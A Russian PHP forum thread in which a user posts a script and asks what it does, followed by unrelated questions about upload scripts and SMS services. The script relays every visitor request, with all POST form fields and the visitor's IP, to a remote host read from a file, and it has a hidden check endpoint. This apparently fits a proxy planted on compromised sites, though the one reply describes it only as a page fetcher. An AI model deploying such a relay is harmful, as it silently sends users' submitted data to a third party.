Нужна помощь знатоков

Тема в разделе "PHP", создана пользователем Rem, 4 апр 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. Rem

    Rem

    Регистр.:
    22 сен 2006
    Сообщения:
    472
    Симпатии:
    41
    Здравствуйте!
    Подскажите что делает данный скрипт?

    Код:
    <?
    
    
    
    $ip=file_get_contents('ip.bin');
    
    if(isset($_GET['ch']))
    {
    	echo 'ya_krevedko';
    	exit;
    }
    
    $f=fsockopen($ip,80);
    
    if($_SERVER['REQUEST_METHOD']=='GET')
    {
    
    	$req="GET ".$_SERVER['REQUEST_URI']."?".$_SERVER['QUERY_STRING']."&ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n".
    	"Host: ".$_SERVER['HTTP_HOST']."\r\n\r\n";
    }
    elseif($_SERVER['REQUEST_METHOD']=='POST')
    {	$post='';
    	foreach($_POST as $name=>$val)
    		$post.=$name."=".urlencode($val).'&';
    
    	$req="POST ".$_SERVER['REQUEST_URI']."?".$_SERVER['QUERY_STRING']."&ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n".
    	"Host: ".$_SERVER['HTTP_HOST']."\r\n".
    	"Content-Type: application/x-www-form-urlencoded\r\n".
    	"Content-Length: ".strlen($post)."\r\n\r\n".$post;
    }
    
    
    
    fputs($f,$req);
    
    
    
    $rep='';
    
    while(!feof($f))
    	$rep.=fread($f,2);
    //echo $rep;
    $rep=strstr($rep,"\r\n\r\n");
    $rep=substr($rep,4);
    echo $rep;
    
    ?>
     
  2. sw04

    sw04 seoplayer

    Регистр.:
    1 дек 2007
    Сообщения:
    601
    Симпатии:
    193
    из файла читает имя сайта.
    подключается, скачивает текст страницы и выводит.
     
  3. Ardis

    Ardis

    Регистр.:
    26 мар 2008
    Сообщения:
    208
    Симпатии:
    40
    Не стал делать новую тему решил прям сюда написать!
    Есть 2 скрипта php для залифки фоток (аватаров), они рабочие, но трабла в том что хостинг не поддерживает php...
    можно ли переписать эти скрипты например на перле или еще что пидумать?
    ЗЫ если есть у кого желание помоч то стучите в асю, если все сделаем в обиде не оставлю;)
     
  4. ~Daniel~

    ~Daniel~ Создатель

    Регистр.:
    1 янв 2008
    Сообщения:
    44
    Симпатии:
    10
    Скрипт на перле.
    Но ты уверен, что на хостере есть перл? Если у него даже php нету...

    А вообще это раздел о php, а не о таких альтернативных способах

     
  5. Tolyt

    Tolyt Создатель

    Регистр.:
    26 июн 2008
    Сообщения:
    21
    Симпатии:
    0
    А можно сделать код для отправки смс сообщений с сайта?
     
  6. den987

    den987 Создатель

    Регистр.:
    27 май 2009
    Сообщения:
    18
    Симпатии:
    2
    для отправки смс в любом случае прийдется пользовать сторонними ресурсами типа smscoin.com, т.к. сервер сам по себе не умеет их отправлять
     
  7. max-oligarh

    max-oligarh Постоялец

    Регистр.:
    4 май 2009
    Сообщения:
    68
    Симпатии:
    2
    можно напрмер слать на email вида 733939393@sms.beemail.ru если подключен бимаил (у других провадеров тоже есть подобные сервисы)
     
  8. ZeFiR

    ZeFiR Создатель

    Регистр.:
    16 фев 2007
    Сообщения:
    10
    Симпатии:
    1
    u-sms.ru в помощь, неплохой сервис
     
Статус темы:
Закрыта.